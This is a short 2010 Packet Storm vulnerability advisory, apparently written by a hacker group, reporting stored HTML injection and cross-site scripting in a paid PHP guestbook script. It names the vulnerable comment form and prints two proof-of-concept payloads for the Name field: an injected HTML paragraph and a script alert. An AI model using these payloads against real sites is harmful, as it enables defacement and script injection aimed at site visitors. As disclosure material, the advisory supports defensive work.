Lucene search

K
packetstormAnTi SeCuRePACKETSTORM:92808
HistoryAug 17, 2010 - 12:00 a.m.

GuestBook Script PHP Cross Site Scripting / HTML Injection

2010-08-1700:00:00
AnTi SeCuRe
packetstormsecurity.com
38
`=======================================================================  
# GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities  
=======================================================================  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
#################################  
# _____ __ __ /_ __/ #  
# / ___/ \ \ / / / / #  
# (__ ) \ \/ / / / #  
# /____/ \__/ /_/ #  
#################################  
# Vendor: http://www.guestbookscripts.com/demo_guestbook.php  
# Date: 2010-08-15  
# Author: AnTi SeCuRe  
# Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members ..  
# Contact: [email protected]  
# Home: WwW.Sa-ViRuS.CoM  
########################################################################  
  
[~]Note : Its not free ,, Its By 17,99  
[~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php  
  
  
[~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new  
Add A New Comment And The exploit is in Name :)  
<p align="center"><b>Sa-ViRuS.CoM</b></p>  
  
  
  
[~] Xss Vuln. : http://server/demo_guestbook.php?act=new  
Add A New Comment And The exploit is in Name :)  
<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>  
  
  
  
Thx To : Allah   
  
`